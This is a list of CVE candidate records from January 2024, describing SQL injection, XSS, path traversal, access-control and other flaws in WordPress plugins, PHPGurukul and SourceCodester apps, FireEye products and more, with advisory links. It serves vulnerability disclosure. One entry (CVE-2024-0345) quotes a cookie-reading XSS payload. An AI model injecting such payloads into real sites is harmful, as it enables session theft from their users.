CVE    2024    366    Candidate    The Starbox – the Author Box for Humans plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.4.7 via the action function due to missing validation on a user controlled key. This makes it possible for subscribers to view plugin preferences and potentially other user settings.    MISC:https://plugins.trac.wordpress.org/browser/starbox/trunk/core/UserSettings.php   |   URL:https://plugins.trac.wordpress.org/browser/starbox/trunk/core/UserSettings.php   |   MISC:https://plugins.trac.wordpress.org/changeset/3028775/starbox/trunk?contextall=1&old=3000701&old_path=%2Fstarbox%2Ftrunk   |   URL:https://plugins.trac.wordpress.org/changeset/3028775/starbox/trunk?contextall=1&old=3000701&old_path=%2Fstarbox%2Ftrunk   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c47601b4-bf16-4f59-b5f3-584a8eac7c67?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c47601b4-bf16-4f59-b5f3-584a8eac7c67?source=cve    Assigned (20240109)
CVE    2024    365    Candidate    The Fancy Product Designer WordPress plugin before 6.1.5 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by administrators.    MISC:https://wpscan.com/vulnerability/4b8b9638-d52a-40bc-b298-ae1c74788c18/   |   URL:https://wpscan.com/vulnerability/4b8b9638-d52a-40bc-b298-ae1c74788c18/    Assigned (20240109)
CVE    2024    364    Candidate    A vulnerability, which was classified as critical, was found in PHPGurukul Hospital Management System 1.0. This affects an unknown part of the file admin/query-details.php. The manipulation of the argument adminremark leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250131.    MISC:https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL11.docx   |   URL:https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL11.docx   |   MISC:https://vuldb.com/?ctiid.250131   |   URL:https://vuldb.com/?ctiid.250131   |   MISC:https://vuldb.com/?id.250131   |   URL:https://vuldb.com/?id.250131    Assigned (20240109)
CVE    2024    363    Candidate    A vulnerability, which was classified as critical, has been found in PHPGurukul Hospital Management System 1.0. Affected by this issue is some unknown functionality of the file admin/patient-search.php. The manipulation of the argument searchdata leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250130 is the identifier assigned to this vulnerability.    MISC:https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL10.docx   |   URL:https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL10.docx   |   MISC:https://vuldb.com/?ctiid.250130   |   URL:https://vuldb.com/?ctiid.250130   |   MISC:https://vuldb.com/?id.250130   |   URL:https://vuldb.com/?id.250130    Assigned (20240109)
CVE    2024    362    Candidate    A vulnerability classified as critical was found in PHPGurukul Hospital Management System 1.0. Affected by this vulnerability is an unknown functionality of the file admin/change-password.php. The manipulation of the argument cpass leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-250129 was assigned to this vulnerability.    MISC:https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL8.docx   |   URL:https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL8.docx   |   MISC:https://vuldb.com/?ctiid.250129   |   URL:https://vuldb.com/?ctiid.250129   |   MISC:https://vuldb.com/?id.250129   |   URL:https://vuldb.com/?id.250129    Assigned (20240109)
CVE    2024    361    Candidate    A vulnerability classified as critical has been found in PHPGurukul Hospital Management System 1.0. Affected is an unknown function of the file admin/contact.php. The manipulation of the argument mobnum leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250128.    MISC:https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL7.docx   |   URL:https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL7.docx   |   MISC:https://vuldb.com/?ctiid.250128   |   URL:https://vuldb.com/?ctiid.250128   |   MISC:https://vuldb.com/?id.250128   |   URL:https://vuldb.com/?id.250128    Assigned (20240109)
CVE    2024    360    Candidate    A vulnerability was found in PHPGurukul Hospital Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file admin/edit-doctor-specialization.php. The manipulation of the argument doctorspecilization leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250127.    MISC:https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL4.docx   |   URL:https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL4.docx   |   MISC:https://vuldb.com/?ctiid.250127   |   URL:https://vuldb.com/?ctiid.250127   |   MISC:https://vuldb.com/?id.250127   |   URL:https://vuldb.com/?id.250127    Assigned (20240109)
CVE    2024    359    Candidate    A vulnerability was found in code-projects Simple Online Hotel Reservation System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login.php. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250126 is the identifier assigned to this vulnerability.    MISC:https://github.com/ZJQcicadawings/VulSql/blob/main/Simple%20Online%20Hotel%20Reservation%20System%20login.php%20has%20Sqlinjection.pdf   |   URL:https://github.com/ZJQcicadawings/VulSql/blob/main/Simple%20Online%20Hotel%20Reservation%20System%20login.php%20has%20Sqlinjection.pdf   |   MISC:https://vuldb.com/?ctiid.250126   |   URL:https://vuldb.com/?ctiid.250126   |   MISC:https://vuldb.com/?id.250126   |   URL:https://vuldb.com/?id.250126    Assigned (20240109)
CVE    2024    358    Candidate    A vulnerability was found in DeShang DSO2O up to 4.1.0. It has been classified as critical. This affects an unknown part of the file /install/install.php. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250125 was assigned to this vulnerability.    MISC:https://note.zhaoj.in/share/Po2N8SpTuzrV   |   URL:https://note.zhaoj.in/share/Po2N8SpTuzrV   |   MISC:https://vuldb.com/?ctiid.250125   |   URL:https://vuldb.com/?ctiid.250125   |   MISC:https://vuldb.com/?id.250125   |   URL:https://vuldb.com/?id.250125    Assigned (20240109)
CVE    2024    357    Candidate    A vulnerability was found in coderd-repos Eva 1.0.0 and classified as critical. Affected by this issue is some unknown functionality of the file /system/traceLog/page of the component HTTP POST Request Handler. The manipulation of the argument property leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250124.    MISC:https://github.com/laoquanshi/heishou/blob/main/eva%20sql.md   |   URL:https://github.com/laoquanshi/heishou/blob/main/eva%20sql.md   |   MISC:https://vuldb.com/?ctiid.250124   |   URL:https://vuldb.com/?ctiid.250124   |   MISC:https://vuldb.com/?id.250124   |   URL:https://vuldb.com/?id.250124    Assigned (20240109)
CVE    2024    356    Candidate    A vulnerability has been found in Mandelo ssm_shiro_blog 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file updateRoles of the component Backend. The manipulation leads to improper access controls. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250123.    MISC:https://medium.com/@heishou/ssm-has-a-vertical-override-vulnerability-8728da71842e   |   URL:https://medium.com/@heishou/ssm-has-a-vertical-override-vulnerability-8728da71842e   |   MISC:https://vuldb.com/?ctiid.250123   |   URL:https://vuldb.com/?ctiid.250123   |   MISC:https://vuldb.com/?id.250123   |   URL:https://vuldb.com/?id.250123    Assigned (20240109)
CVE    2024    355    Candidate    A vulnerability, which was classified as critical, was found in PHPGurukul Dairy Farm Shop Management System up to 1.1. Affected is an unknown function of the file add-category.php. The manipulation of the argument category leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250122 is the identifier assigned to this vulnerability.    MISC:https://medium.com/@heishou/dfsms-has-sql-injection-vulnerability-e9cfbc375be8   |   URL:https://medium.com/@heishou/dfsms-has-sql-injection-vulnerability-e9cfbc375be8   |   MISC:https://vuldb.com/?ctiid.250122   |   URL:https://vuldb.com/?ctiid.250122   |   MISC:https://vuldb.com/?id.250122   |   URL:https://vuldb.com/?id.250122    Assigned (20240109)
CVE    2024    354    Candidate    A vulnerability, which was classified as critical, has been found in unknown-o download-station up to 1.1.8. This issue affects some unknown processing of the file index.php. The manipulation of the argument f leads to path traversal: '../filedir'. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250121 was assigned to this vulnerability.    MISC:https://note.zhaoj.in/share/nHD5xiHQgHG0   |   URL:https://note.zhaoj.in/share/nHD5xiHQgHG0   |   MISC:https://vuldb.com/?ctiid.250121   |   URL:https://vuldb.com/?ctiid.250121   |   MISC:https://vuldb.com/?id.250121   |   URL:https://vuldb.com/?id.250121    Assigned (20240109)
CVE    2024    353    Candidate    Local privilege escalation vulnerability potentially allowed an attacker to misuse ESET’s file operations to delete files without having proper permission.    MISC:https://support.eset.com/en/ca8612-eset-customer-advisory-link-following-local-privilege-escalation-vulnerability-in-eset-products-for-windows-fixed   |   URL:https://support.eset.com/en/ca8612-eset-customer-advisory-link-following-local-privilege-escalation-vulnerability-in-eset-products-for-windows-fixed    Assigned (20240109)
CVE    2024    352    Candidate    A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250120.    MISC:https://note.zhaoj.in/share/ciwYj7QXC4sZ   |   URL:https://note.zhaoj.in/share/ciwYj7QXC4sZ   |   MISC:https://vuldb.com/?ctiid.250120   |   URL:https://vuldb.com/?ctiid.250120   |   MISC:https://vuldb.com/?id.250120   |   URL:https://vuldb.com/?id.250120    Assigned (20240109)
CVE    2024    351    Candidate    A vulnerability classified as problematic has been found in SourceCodester Engineers Online Portal 1.0. This affects an unknown part. The manipulation leads to session fixation. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250119.    MISC:https://mega.nz/file/LJlBQLhR#Ix4yNMdtVtlJFQP6Ae6fbXmnyH4bXTTAWN_JT5kzXzg   |   URL:https://mega.nz/file/LJlBQLhR#Ix4yNMdtVtlJFQP6Ae6fbXmnyH4bXTTAWN_JT5kzXzg   |   MISC:https://vuldb.com/?ctiid.250119   |   URL:https://vuldb.com/?ctiid.250119   |   MISC:https://vuldb.com/?id.250119   |   URL:https://vuldb.com/?id.250119    Assigned (20240109)
CVE    2024    350    Candidate    A vulnerability was found in SourceCodester Engineers Online Portal 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation leads to session expiration. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. VDB-250118 is the identifier assigned to this vulnerability.    MISC:https://mega.nz/file/fckFBASJ#lffaC0xY44ri9Ln-7hrUbUtq2GTiE8roiW8guR7QeVE   |   URL:https://mega.nz/file/fckFBASJ#lffaC0xY44ri9Ln-7hrUbUtq2GTiE8roiW8guR7QeVE   |   MISC:https://vuldb.com/?ctiid.250118   |   URL:https://vuldb.com/?ctiid.250118   |   MISC:https://vuldb.com/?id.250118   |   URL:https://vuldb.com/?id.250118    Assigned (20240109)
CVE    2024    349    Candidate    A vulnerability was found in SourceCodester Engineers Online Portal 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to sensitive cookie without secure attribute. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-250117 was assigned to this vulnerability.    MISC:https://mega.nz/file/TU1X3TIQ#7bPvxEP0KrdoDZVg-dqinNC5fEQrG5uu58jWzPGh904   |   URL:https://mega.nz/file/TU1X3TIQ#7bPvxEP0KrdoDZVg-dqinNC5fEQrG5uu58jWzPGh904   |   MISC:https://vuldb.com/?ctiid.250117   |   URL:https://vuldb.com/?ctiid.250117   |   MISC:https://vuldb.com/?id.250117   |   URL:https://vuldb.com/?id.250117    Assigned (20240109)
CVE    2024    348    Candidate    A vulnerability was found in SourceCodester Engineers Online Portal 1.0. It has been classified as problematic. Affected is an unknown function of the component File Upload Handler. The manipulation leads to resource consumption. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250116.    MISC:https://mega.nz/file/HNkn2QbI#EjefwKgFoAjtWcxrQFMgBfhVQ1LAf2hq7Jg-nDsE-P4   |   URL:https://mega.nz/file/HNkn2QbI#EjefwKgFoAjtWcxrQFMgBfhVQ1LAf2hq7Jg-nDsE-P4   |   MISC:https://vuldb.com/?ctiid.250116   |   URL:https://vuldb.com/?ctiid.250116   |   MISC:https://vuldb.com/?id.250116   |   URL:https://vuldb.com/?id.250116    Assigned (20240109)
CVE    2024    347    Candidate    A vulnerability was found in SourceCodester Engineers Online Portal 1.0 and classified as problematic. This issue affects some unknown processing of the file signup_teacher.php. The manipulation of the argument Password leads to weak password requirements. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250115.    MISC:https://mega.nz/file/2d8GiY4Z#QSKItMUgIsW1-A-QPs9dgUSd2SCZfDg4aHORttFpUF0   |   URL:https://mega.nz/file/2d8GiY4Z#QSKItMUgIsW1-A-QPs9dgUSd2SCZfDg4aHORttFpUF0   |   MISC:https://vuldb.com/?ctiid.250115   |   URL:https://vuldb.com/?ctiid.250115   |   MISC:https://vuldb.com/?id.250115   |   URL:https://vuldb.com/?id.250115    Assigned (20240109)
CVE    2024    346    Candidate    A vulnerability has been found in CodeAstro Vehicle Booking System 1.0 and classified as problematic. This vulnerability affects unknown code of the file usr/user-give-feedback.php of the component Feedback Page. The manipulation of the argument My Testemonial leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250114 is the identifier assigned to this vulnerability.    MISC:https://drive.google.com/file/d/1bao4YK4GwvAvCdCrsW5UpJZdvREdc_Yj/view?usp=sharing   |   URL:https://drive.google.com/file/d/1bao4YK4GwvAvCdCrsW5UpJZdvREdc_Yj/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.250114   |   URL:https://vuldb.com/?ctiid.250114   |   MISC:https://vuldb.com/?id.250114   |   URL:https://vuldb.com/?id.250114    Assigned (20240109)
CVE    2024    345    Candidate    A vulnerability, which was classified as problematic, was found in CodeAstro Vehicle Booking System 1.0. This affects an unknown part of the file usr/usr-register.php of the component User Registration. The manipulation of the argument Full_Name/Last_Name/Address with the input <script>alert(document.cookie)</script> leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250113 was assigned to this vulnerability.    MISC:https://drive.google.com/file/d/1ihxLw4kzbAbDhHtca3UnTaB-iMWHi5DJ/view?usp=sharing   |   URL:https://drive.google.com/file/d/1ihxLw4kzbAbDhHtca3UnTaB-iMWHi5DJ/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.250113   |   URL:https://vuldb.com/?ctiid.250113   |   MISC:https://vuldb.com/?id.250113   |   URL:https://vuldb.com/?id.250113    Assigned (20240109)
CVE    2024    344    Candidate    A vulnerability, which was classified as critical, has been found in soxft TimeMail up to 1.1. Affected by this issue is some unknown functionality of the file check.php. The manipulation of the argument c leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250112.    MISC:https://note.zhaoj.in/share/VSutvlpgCJkD   |   URL:https://note.zhaoj.in/share/VSutvlpgCJkD   |   MISC:https://vuldb.com/?ctiid.250112   |   URL:https://vuldb.com/?ctiid.250112   |   MISC:https://vuldb.com/?id.250112   |   URL:https://vuldb.com/?id.250112    Assigned (20240109)
CVE    2024    343    Candidate    A vulnerability classified as problematic was found in CodeAstro Simple House Rental System 5.6. Affected by this vulnerability is an unknown functionality of the component Login Panel. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250111.    MISC:https://drive.google.com/file/d/1NHdebIGiV8FybYFGXIqWHjdVGzZCQqAm/view?usp=sharing   |   URL:https://drive.google.com/file/d/1NHdebIGiV8FybYFGXIqWHjdVGzZCQqAm/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.250111   |   URL:https://vuldb.com/?ctiid.250111   |   MISC:https://vuldb.com/?id.250111   |   URL:https://vuldb.com/?id.250111    Assigned (20240109)
CVE    2024    342    Candidate    A vulnerability classified as critical has been found in Inis up to 2.0.1. Affected is an unknown function of the file /app/api/controller/default/Sqlite.php. The manipulation of the argument sql leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250110 is the identifier assigned to this vulnerability.    MISC:https://note.zhaoj.in/share/nWYJHrmUqv7i   |   URL:https://note.zhaoj.in/share/nWYJHrmUqv7i   |   MISC:https://vuldb.com/?ctiid.250110   |   URL:https://vuldb.com/?ctiid.250110   |   MISC:https://vuldb.com/?id.250110   |   URL:https://vuldb.com/?id.250110    Assigned (20240109)
CVE    2024    341    Candidate    A vulnerability was found in Inis up to 2.0.1. It has been rated as problematic. This issue affects some unknown processing of the file /app/api/controller/default/File.php of the component GET Request Handler. The manipulation of the argument path leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. The identifier VDB-250109 was assigned to this vulnerability.    MISC:https://note.zhaoj.in/share/VYx8H9u8gyHw   |   URL:https://note.zhaoj.in/share/VYx8H9u8gyHw   |   MISC:https://vuldb.com/?ctiid.250109   |   URL:https://vuldb.com/?ctiid.250109   |   MISC:https://vuldb.com/?id.250109   |   URL:https://vuldb.com/?id.250109    Assigned (20240109)
CVE    2024    340    Candidate    A vulnerability was found in vhost_new_msg in drivers/vhost/vhost.c in the Linux kernel, which does not properly initialize memory in messages passed between virtual guests and the host operating system in the vhost/vhost.c:vhost_new_msg() function. This issue can allow local privileged users to read some kernel memory contents when reading from the /dev/vhost-net device file.    MISC:RHBZ#2257406   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2257406   |   MISC:https://access.redhat.com/security/cve/CVE-2024-0340   |   URL:https://access.redhat.com/security/cve/CVE-2024-0340   |   MISC:https://lore.kernel.org/lkml/5kn47peabxjrptkqa6dwtyus35ahf4pcj4qm4pumse33kxqpjw@mec4se5relrc/T/   |   URL:https://lore.kernel.org/lkml/5kn47peabxjrptkqa6dwtyus35ahf4pcj4qm4pumse33kxqpjw@mec4se5relrc/T/    Assigned (20240109)
CVE    2024    338    Candidate    A buffer overflow vulnerability has been found in XAMPP affecting version 8.2.4 and earlier. An attacker could execute arbitrary code through a long file debug argument that controls the Structured Exception Handler (SEH).    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-xampp   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-xampp    Assigned (20240109)
CVE    2024    337    Candidate    The Travelpayouts: All Travel Brands in One Place WordPress plugin through 1.1.15 is vulnerable to Open Redirect due to insufficient validation on the travelpayouts_redirect variable. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.    MISC:https://wpscan.com/vulnerability/2f17a274-8676-4f4e-989f-436030527890/   |   URL:https://wpscan.com/vulnerability/2f17a274-8676-4f4e-989f-436030527890/    Assigned (20240109)
CVE    2024    333    Candidate    Insufficient data validation in Extensions in Google Chrome prior to 120.0.6099.216 allowed an attacker in a privileged network position to install a malicious extension via a crafted HTML page. (Chromium security severity: High)    FEDORA:FEDORA-2024-01607ac0ae   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IPYCYENYQYADCOS6XG4JITUVRZ6HTE2B/   |   FEDORA:FEDORA-2024-237107cece   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4BXC7FJIAZRY3P72XC4Z4UOW2QDA7YX7/   |   MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_9.html   |   URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_9.html   |   MISC:https://crbug.com/1513379   |   URL:https://crbug.com/1513379    Assigned (20240108)
CVE    2024    326    Candidate    The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Link Wrapper functionality in all versions up to, and including, 4.10.17 due to insufficient input sanitization and output escaping on user supplied links. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/trunk/includes/class-premium-template-tags.php#L1638   |   URL:https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/trunk/includes/class-premium-template-tags.php#L1638   |   MISC:https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/trunk/modules/premium-wrapper-link/module.php#L173   |   URL:https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/trunk/modules/premium-wrapper-link/module.php#L173   |   MISC:https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/trunk/widgets/premium-button.php#L1709   |   URL:https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/trunk/widgets/premium-button.php#L1709   |   MISC:https://plugins.trac.wordpress.org/changeset/3022824/premium-addons-for-elementor/trunk/modules/premium-wrapper-link/module.php   |   URL:https://plugins.trac.wordpress.org/changeset/3022824/premium-addons-for-elementor/trunk/modules/premium-wrapper-link/module.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/22ba0eaf-f514-420a-9680-8126f6dcdde9?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/22ba0eaf-f514-420a-9680-8126f6dcdde9?source=cve    Assigned (20240108)
CVE    2024    325    Candidate    In Helix Sync versions prior to 2024.1, a local command injection was identified. Reported by Bryan Riggins.    MISC:https://perforce.com   |   URL:https://perforce.com    Assigned (20240108)
CVE    2024    324    Candidate    The User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wppb_two_factor_authentication_settings_update' function in all versions up to, and including, 3.10.8. This makes it possible for unauthenticated attackers to enable or disable the 2FA functionality present in the Premium version of the plugin for arbitrary user roles.    MISC:https://github.com/WordpressPluginDirectory/profile-builder/blob/main/profile-builder/admin/admin-functions.php#L517   |   URL:https://github.com/WordpressPluginDirectory/profile-builder/blob/main/profile-builder/admin/admin-functions.php#L517   |   MISC:https://plugins.trac.wordpress.org/changeset/3022354/   |   URL:https://plugins.trac.wordpress.org/changeset/3022354/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/23caef95-36b6-40aa-8dd7-51a376790a40?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/23caef95-36b6-40aa-8dd7-51a376790a40?source=cve    Assigned (20240108)
CVE    2024    323    Candidate    Use of a Broken or Risky Cryptographic Algorithm vulnerability in B&R Industrial Automation Automation Runtime (SDM modules). The FTP server used on the B&R Automation Runtime supports unsecure encryption mechanisms, such as SSLv3, TLSv1.0 and TLSv1.1. A network-based attacker can exploit the flaws to conduct man-in-the-middle attacks or to decrypt communications between the affected product clients. This issue affects Automation Runtime: from 14.0 before 14.93.    MISC:https://www.br-automation.com/fileadmin/SA23P004_FTP_uses_unsecure_encryption_mechanisms-f57c147c.pdf   |   URL:https://www.br-automation.com/fileadmin/SA23P004_FTP_uses_unsecure_encryption_mechanisms-f57c147c.pdf    Assigned (20240108)
CVE    2024    322    Candidate    Out-of-bounds Read in GitHub repository gpac/gpac prior to 2.3-DEV.    MISC:https://github.com/gpac/gpac/commit/092904b80edbc4dce315684a59cc3184c45c1b70   |   URL:https://github.com/gpac/gpac/commit/092904b80edbc4dce315684a59cc3184c45c1b70   |   MISC:https://huntr.com/bounties/87611fc9-ed7c-43e9-8e52-d83cd270bbec   |   URL:https://huntr.com/bounties/87611fc9-ed7c-43e9-8e52-d83cd270bbec    Assigned (20240108)
CVE    2024    321    Candidate    Stack-based Buffer Overflow in GitHub repository gpac/gpac prior to 2.3-DEV.    MISC:https://github.com/gpac/gpac/commit/d0ced41651b279bb054eb6390751e2d4eb84819a   |   URL:https://github.com/gpac/gpac/commit/d0ced41651b279bb054eb6390751e2d4eb84819a   |   MISC:https://huntr.com/bounties/4c027b94-8e9c-4c31-a169-893b25047769   |   URL:https://huntr.com/bounties/4c027b94-8e9c-4c31-a169-893b25047769    Assigned (20240108)
CVE    2024    320    Candidate    Cross-Site Scripting in FireEye Malware Analysis (AX) affecting version 9.0.3.936530. This vulnerability allows an attacker to send a specially crafted JavaScript payload in the application URL to retrieve the session details of a legitimate user.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products    Assigned (20240108)
CVE    2024    319    Candidate    Open Redirect vulnerability in FireEye HXTool affecting version 4.6, the exploitation of which could allow an attacker to redirect a legitimate user to a malicious page by changing the 'redirect_uri' parameter.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products    Assigned (20240108)
CVE    2024    318    Candidate    Cross-Site Scripting in FireEye HXTool affecting version 4.6. This vulnerability allows an attacker to store a specially crafted JavaScript payload in the 'Profile Name' and 'Hostname/IP' parameters that will be triggered when items are loaded.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products    Assigned (20240108)
CVE    2024    317    Candidate    Cross-Site Scripting in FireEye EX, affecting version 9.0.3.936727. Exploitation of this vulnerability allows an attacker to send a specially crafted JavaScript payload via the 'type' and 's_f_name' parameters to an authenticated user to retrieve their session details.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products    Assigned (20240108)
CVE    2024    316    Candidate    Improper cleanup vulnerability in exceptions thrown in FireEye Endpoint Security, affecting version 5.2.0.958244. This vulnerability could allow an attacker to send multiple request packets to the containment_notify/preview parameter, which could lead to a service outage.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products    Assigned (20240108)
CVE    2024    315    Candidate    Remote file inclusion vulnerability in FireEye Central Management affecting version 9.1.1.956704. This vulnerability allows an attacker to upload a malicious PDF file to the system during the report creation process.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products    Assigned (20240108)
CVE    2024    314    Candidate    XSS vulnerability in FireEye Central Management affecting version 9.1.1.956704, which could allow an attacker to modify special HTML elements in the application and cause a reflected XSS, leading to a session hijacking.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products    Assigned (20240108)
CVE    2024    313    Candidate    A malicious insider exploiting this vulnerability can circumvent existing security controls put in place by the organization. On the contrary, if the victim is legitimately using the temporary bypass to reach out to the Internet for retrieving application and system updates, a remote device could target it and undo the bypass, thereby denying the victim access to the update service, causing it to fail.    MISC:https://kcm.trellix.com/corporate/index?page=content&id=SB10418   |   URL:https://kcm.trellix.com/corporate/index?page=content&id=SB10418    Assigned (20240108)
CVE    2024    312    Candidate    A malicious insider can uninstall Skyhigh Client Proxy without a valid uninstall password.    MISC:https://kcm.trellix.com/corporate/index?page=content&id=SB10418   |   URL:https://kcm.trellix.com/corporate/index?page=content&id=SB10418    Assigned (20240108)
CVE    2024    311    Candidate    A malicious insider can bypass the existing policy of Skyhigh Client Proxy without a valid release code.    MISC:https://kcm.trellix.com/corporate/index?page=content&id=SB10418   |   URL:https://kcm.trellix.com/corporate/index?page=content&id=SB10418    Assigned (20240108)
CVE    2024    310    Candidate    A content-security-policy vulnerability in ENS Control browser extension prior to 10.7.0 Update 15 allows a remote attacker to alter the response header parameter setting to switch the content security policy into report-only mode, allowing an attacker to bypass the content-security-policy configuration.    MISC:https://kcm.trellix.com/corporate/index?page=content&id=SB10417   |   URL:https://kcm.trellix.com/corporate/index?page=content&id=SB10417    Assigned (20240108)
CVE    2024    308    Candidate    A vulnerability was found in Inis up to 2.0.1. It has been rated as critical. This issue affects some unknown processing of the file app/api/controller/default/Proxy.php. The manipulation of the argument p_url leads to server-side request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249875.    MISC:https://note.zhaoj.in/share/2E2JG2PClHGF   |   URL:https://note.zhaoj.in/share/2E2JG2PClHGF   |   MISC:https://vuldb.com/?ctiid.249875   |   URL:https://vuldb.com/?ctiid.249875   |   MISC:https://vuldb.com/?id.249875   |   URL:https://vuldb.com/?id.249875    Assigned (20240107)
